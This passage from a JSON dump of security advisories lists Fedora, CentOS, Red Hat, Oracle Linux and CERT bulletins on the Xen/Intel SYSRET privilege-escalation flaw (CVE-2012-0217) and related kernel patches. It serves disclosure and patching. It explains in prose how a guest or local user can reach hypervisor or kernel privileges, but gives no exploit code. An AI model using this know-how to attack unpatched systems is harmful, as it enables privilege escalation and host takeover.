"2012-06-26T00:52:23", "id": "FEDORA:00A04209F2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.2-20.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:42:08", "published": 
"2012-06-26T00:42:08", "id": "FEDORA:0275A21469", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.2-8.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-05T21:26:27", "published": "2012-08-05T21:26:27", "id": "FEDORA:A2013212DB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.2-24.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-05T21:31:48", "published": "2012-08-05T21:31:48", "id": "FEDORA:638FD21667", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.2-9.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-21T09:48:25", "published": "2012-08-21T09:48:25", "id": "FEDORA:8E44A20A90", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-2.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": 
["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-08-21T09:53:53", "published": "2012-08-21T09:53:53", "id": "FEDORA:403F220D9F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.3-1.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1583", "CVE-2011-1898", "CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:41:50", "published": "2012-06-26T00:41:50", "id": "FEDORA:4C1E320FD7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: xen-4.1.2-8.fc15", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-09-17T17:45:19", "published": "2012-09-17T17:45:19", "id": "FEDORA:C1281214A6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-4.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", 
"CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411", "CVE-2012-4544"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-11-09T18:01:40", "published": "2012-11-09T18:01:40", "id": "FEDORA:A80012051E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: xen-4.1.3-5.fc17", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934", "CVE-2012-3432", "CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3495", "CVE-2012-3496", "CVE-2012-3498", "CVE-2012-3515", "CVE-2012-4411"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-09-17T18:00:53", "published": "2012-09-17T18:00:53", "id": "FEDORA:63A4E21779", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: xen-4.1.3-2.fc16", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0721\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. 
An unprivileged\nuser in a 64-bit para-virtualized guest, that is running on a 64-bit host\nthat has an Intel CPU, could use this flaw to crash the host or,\npotentially, escalate their privileges, allowing them to execute arbitrary\ncode at the hypervisor level. (CVE-2012-0217, Important)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs, leading\nto a CPU hard lockup, when running on the Xen hypervisor implementation. An\nunprivileged user in a 64-bit para-virtualized guest could use this flaw to\ncrash the host. Warning: After installing this update, hosts that are using\nan affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\nfail to boot. In order to boot such hosts, the new kernel parameter,\nallow_unsafe, can be used (\"allow_unsafe=on\"). This option should only be\nused with hosts that are running trusted guests, as setting it to \"on\"\nreintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\nModerate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these issues.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. 
The system must be rebooted for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-June/030716.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0721.html", "edition": 3, "modified": "2012-06-13T00:11:19", "published": "2012-06-13T00:11:19", "href": "http://lists.centos.org/pipermail/centos-announce/2012-June/030716.html", "id": "CESA-2012:0721", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An unprivileged\nuser in a 64-bit para-virtualized guest, that is running on a 64-bit host\nthat has an Intel CPU, could use this flaw to crash the host or,\npotentially, escalate their privileges, allowing them to execute arbitrary\ncode at the hypervisor level. (CVE-2012-0217, Important)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs, leading\nto a CPU hard lockup, when running on the Xen hypervisor implementation. An\nunprivileged user in a 64-bit para-virtualized guest could use this flaw to\ncrash the host. Warning: After installing this update, hosts that are using\nan affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\nfail to boot. 
In order to boot such hosts, the new kernel parameter,\nallow_unsafe, can be used (\"allow_unsafe=on\"). This option should only be\nused with hosts that are running trusted guests, as setting it to \"on\"\nreintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\nModerate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these issues.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T11:50:07", "published": "2012-06-12T04:00:00", "id": "RHSA-2012:0721", "href": "https://access.redhat.com/errata/RHSA-2012:0721", "type": "redhat", "title": "(RHSA-2012:0721) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-1583"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running on a\n64-bit host that has an Intel CPU, could use this flaw to crash the host\nor, potentially, escalate their privileges, allowing them to execute\narbitrary code at the hypervisor level. 
(CVE-2012-0217, Important)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit CVE-2012-0217.\n\n* A flaw in the xfrm6_tunnel_rcv() function in the Linux kernel's IPv6\nimplementation could lead to a use-after-free or double free flaw in\ntunnel6_rcv(). A remote attacker could use this flaw to send\nspecially-crafted packets to a target system that is using IPv6 and also\nhas the xfrm6_tunnel kernel module loaded, causing it to crash.\n(CVE-2012-1583, Important)\n\nIf you do not run applications that use xfrm6_tunnel, you can prevent the\nxfrm6_tunnel module from being loaded by creating (as the root user) a\n\"/etc/modprobe.d/xfrm6_tunnel.conf\" file, and adding the following line to\nit:\n\nblacklist xfrm6_tunnel\n\nThis way, the xfrm6_tunnel module cannot be loaded accidentally. A reboot\nis not necessary for this change to take effect.\n\nRed Hat would like to thank the Xen project for reporting CVE-2012-0217.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nThis update also fixes the following bugs:\n\n* A bug in the vsyscall interface caused 32-bit multi-threaded programs,\nwhich received the SIGCANCEL signal right after they returned from a system\ncall, to terminate unexpectedly with a segmentation fault when run on the\nAMD64 or Intel 64 architecture. A patch has been provided to address this\nissue and the crashes no longer occur in the described scenario.\n(BZ#807929)\n\n* Incorrect duplicate MAC addresses were being used on a rack network\ndaughter card that contained a quad-port Intel I350 Gigabit Ethernet\nController. With this update, the underlying source code has been modified\nto address this issue, and correct MAC addresses are now used under all\ncircumstances. (BZ#813195)\n\n* When the Fibre Channel (FC) layer sets a device to \"running\", the layer\nalso scans for other new devices. Previously, there was a race condition\nbetween these two operations. 
Consequently, for certain targets, thousands\nof invalid devices were created by the SCSI layer and the udev service.\nThis update ensures that the FC layer always sets a device to \"online\"\nbefore scanning for others, thus fixing this bug.\n\nAdditionally, when attempting to transition priority groups on a busy FC\ndevice, the multipath layer retried immediately. If this was the only\navailable path, a large number of retry operations were performed in a\nshort period of time. Consequently, the logging of retry messages slowed\ndown the system. This bug has been fixed by ensuring that the DM Multipath\nfeature delays retry operations in the described scenario. (BZ#816683)\n\n* Due to incorrect use of the list_for_each_entry_safe() macro, the\nenumeration of remote procedure calls (RPCs) priority wait queue tasks\nstored in the tk_wait.links list failed. As a consequence, the\nrpc_wake_up() and rpc_wake_up_status() functions failed to wake up all\ntasks. This caused the system to become unresponsive and could\nsignificantly decrease system performance. Now, the\nlist_for_each_entry_safe() macro is no longer used in rpc_wake_up(),\nensuring reasonable system performance. (BZ#817570)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. 
The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T12:10:04", "published": "2012-06-12T04:00:00", "id": "RHSA-2012:0720", "href": "https://access.redhat.com/errata/RHSA-2012:0720", "type": "redhat", "title": "(RHSA-2012:0720) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "kernel:\n[2.6.18-308.8.2.0.1.el5]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy 
Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n+- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.8.2.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970]\nocfs2:\n[1.4.10]\n- ocfs2/dlm: Cleanup mlogs in dlmthread.c dlmast.c and dlmdomain.c\n- ocfs2/dlm: make existing convertion precedent over new lock\n- ocfs2/dlm: Cleanup dlmdebug.c\n- ocfs2/dlm: Minor cleanup\n- ocfs2/dlm: Hard code the values for enums\n- ocfs2: Wakeup down convert thread just after clearing OCFS2 LOCK UPCONVERT FINISHING\n- ocfs2/dlm: Take inflight reference count for remotely mastered resources too\n- ocfs2/dlm: dlmlock remote needs to account for remastery\n- ocfs2: Add some trace log for orphan scan\n- ocfs2: Remove unused old id in ocfs2_commit_cache\n- ocfs2: Remove obsolete comments before ocfs2_start_trans\n- ocfs2: Initialize the bktcnt variable properly and call it bucket_count\n- ocfs2: Use cpu to le16 for e leaf clusters in ocfs2_bg_discontig_add_extent\n- ocfs2: validate bg free bits count after update\n- ocfs2: 
cluster Pin the remote node item in configfs\n- ocfs2: Release buffer head in case of error in ocfs2_double_lock\n- ocfs2: optimize ocfs2 check dir entry with unlikely() annotations\n- ocfs2: Little refactoring against ocfs2 iget\n- ocfs2: Initialize data ac might be used uninitializ\n- ocfs2 Skip mount recovery for hard ro mounts\n- ocfs2: make direntry invalid when deleting it\n- ocfs2: commit trans in error\n- ocfs2: Fix deadlock when allocating page\n- ocfs2: Avoid livelock in ocfs2 readpage", "edition": 5, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "ELSA-2012-0721-1", "href": "http://linux.oracle.com/errata/ELSA-2012-0721-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "kernel:\n[2.6.18-308.8.2.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970]\nocfs2:\n[1.4.10]\n- ocfs2/dlm: Cleanup mlogs in dlmthread.c dlmast.c and dlmdomain.c\n- ocfs2/dlm: make existing convertion precedent over new lock\n- ocfs2/dlm: Cleanup dlmdebug.c\n- ocfs2/dlm: Minor cleanup\n- ocfs2/dlm: Hard code the values for enums\n- ocfs2: Wakeup down convert thread just after clearing OCFS2 LOCK UPCONVERT FINISHING\n- ocfs2/dlm: Take inflight reference count for remotely mastered resources too\n- ocfs2/dlm: dlmlock remote needs to account for remastery\n- ocfs2: Add some trace log for orphan scan\n- ocfs2: Remove unused old id in ocfs2_commit_cache\n- ocfs2: Remove obsolete comments before ocfs2_start_trans\n- ocfs2: Initialize the bktcnt variable properly and call it bucket_count\n- ocfs2: Use cpu 
to le16 for e leaf clusters in ocfs2_bg_discontig_add_extent\n- ocfs2: validate bg free bits count after update\n- ocfs2: cluster Pin the remote node item in configfs\n- ocfs2: Release buffer head in case of error in ocfs2_double_lock\n- ocfs2: optimize ocfs2 check dir entry with unlikely() annotations\n- ocfs2: Little refactoring against ocfs2 iget\n- ocfs2: Initialize data ac might be used uninitializ\n- ocfs2 Skip mount recovery for hard ro mounts\n- ocfs2: make direntry invalid when deleting it\n- ocfs2: commit trans in error\n- ocfs2: Fix deadlock when allocating page\n- ocfs2: Avoid livelock in ocfs2 readpage", "edition": 4, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "ELSA-2012-0721", "href": "http://linux.oracle.com/errata/ELSA-2012-0721.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:42", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934", "CVE-2012-3375"], "description": "[2.6.18-308.11.1.0.1.el5]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 
10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n+- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.11.1.el5]\n- [net] ixgbe: remove flow director stats (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: fix default return value for ixgbe_cache_ring_fdir (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: reverting setup redirection table for multiple packet buffers (Andy Gospodarek) [832169 830226]\n[2.6.18-308.10.1.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970] 
{CVE-2012-2934}\n- [scsi] qla2xxx: Use ha->pdev->revision in 4Gbps MSI-X check. (Chad Dupuis) [816373 800653]\n- [fs] sunrpc: do array overrun check in svc_recv before page alloc (J. Bruce Fields) [820358 814626]\n- [fs] knfsd: fix an NFSD bug with full size non-page-aligned reads (J. Bruce Fields) [820358 814626]\n- [fs] sunrpc: fix oops due to overrunning server's page array (J. Bruce Fields) [820358 814626]\n- [fs] epoll: clear the tfile_check_list on -ELOOP (Jason Baron) [829670 817131]\n- [x86_64] sched: Avoid unnecessary overflow in sched_clock (Prarit Bhargava) [824654 818787]\n- [net] sunrpc: Don't use list_for_each_entry_safe in rpc_wake_up (Steve Dickson) [817571 809937]\n- [s390] qeth: add missing wake_up call (Hendrik Brueckner) [829059 790900]\n[2.6.18-308.9.1.el5]\n- [fs] jbd: clear b_modified before moving the jh to a different transaction (Josef Bacik) [827205 563247]", "edition": 5, "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "ELSA-2012-1061-1", "href": "http://linux.oracle.com/errata/ELSA-2012-1061-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:28", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934", "CVE-2012-3375"], "description": "[2.6.18-308.11.1.el5]\n- [net] ixgbe: remove flow director stats (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: fix default return value for ixgbe_cache_ring_fdir (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: reverting setup redirection table for multiple packet buffers (Andy Gospodarek) [832169 830226]\n[2.6.18-308.10.1.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970] 
{CVE-2012-2934}\n- [scsi] qla2xxx: Use ha->pdev->revision in 4Gbps MSI-X check. (Chad Dupuis) [816373 800653]\n- [fs] sunrpc: do array overrun check in svc_recv before page alloc (J. Bruce Fields) [820358 814626]\n- [fs] knfsd: fix an NFSD bug with full size non-page-aligned reads (J. Bruce Fields) [820358 814626]\n- [fs] sunrpc: fix oops due to overrunning server's page array (J. Bruce Fields) [820358 814626]\n- [fs] epoll: clear the tfile_check_list on -ELOOP (Jason Baron) [829670 817131]\n- [x86_64] sched: Avoid unnecessary overflow in sched_clock (Prarit Bhargava) [824654 818787]\n- [net] sunrpc: Don't use list_for_each_entry_safe in rpc_wake_up (Steve Dickson) [817571 809937]\n- [s390] qeth: add missing wake_up call (Hendrik Brueckner) [829059 790900]\n[2.6.18-308.9.1.el5]\n- [fs] jbd: clear b_modified before moving the jh to a different transaction (Josef Bacik) [827205 563247]", "edition": 4, "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "ELSA-2012-1061", "href": "http://linux.oracle.com/errata/ELSA-2012-1061.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:51", "bulletinFamily": "info", "cvelist": ["CVE-2006-0744", "CVE-2012-0217", "CVE-2012-0218"], "description": "### Overview \n\nSome 64-bit operating systems and virtualization software running on Intel CPU hardware are vulnerable to a local privilege escalation attack. The vulnerability may be exploited for local privilege escalation or a guest-to-host virtual machine escape.\n\nIntel claims that this vulnerability is a software implementation issue, as their processors are functioning as per their documented specifications. 
However, software that fails to take the Intel-specific SYSRET behavior into account may be vulnerable.\n\n### Description \n\nA [ring3 attacker](<http://en.wikipedia.org/wiki/Ring_3>) may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP). The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. \n \n**Details from Xen** \n \n[_CVE-2012-0217 / XSA-7 - 64-bit PV guest privilege escalation vulnerability_](<http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>) \n \n_A vulnerability which can allow a 64-bit PV guest kernel running on a 64-bit hypervisor to escalate privileges to that of the host by arranging for a system call to return via sysret to a non-canonical RIP. Intel CPUs deliver the resulting exception in an undesirable processor state._ \n \n**Details from FreeBSD** \n \n[_FreeBSD-SA-12:04.sysret:__ __Privilege escalation when returning from kernel_](<http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>) \n \n_FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash._ \n \n**Details from Microsoft** \n \n[_User Mode Scheduler Memory Corruption Vulnerability - __MS12-042 - Important_](<http://technet.microsoft.com/en-us/security/bulletin/MS12-042>) \n \n_An elevation of privilege vulnerability exists in the way that the Windows User Mode Scheduler handles system requests. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full administrative rights._ \n \n_Mitigating Factors for User Mode Scheduler Memory Corruption Vulnerability_ \n \n_Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation: _\n\n * _An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users._\n * _This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2._\n * _Systems with AMD or ARM-based CPUs are not affected by this vulnerability._\n \n**Details from Red Hat** \n \n[_RHSA-2012:0720-1_](<https://rhn.redhat.com/errata/RHSA-2012-0720.html>)_ & _[_RHSA-2012:0721-1_](<https://rhn.redhat.com/errata/RHSA-2012-0721.html>)_: __It was found that the Xen hypervisor implementation as shipped with Red Hat Enterprise Linux 5 did not properly restrict the syscall return addresses in the sysret return path to canonical addresses. An unprivileged user in a 64-bit para-virtualized 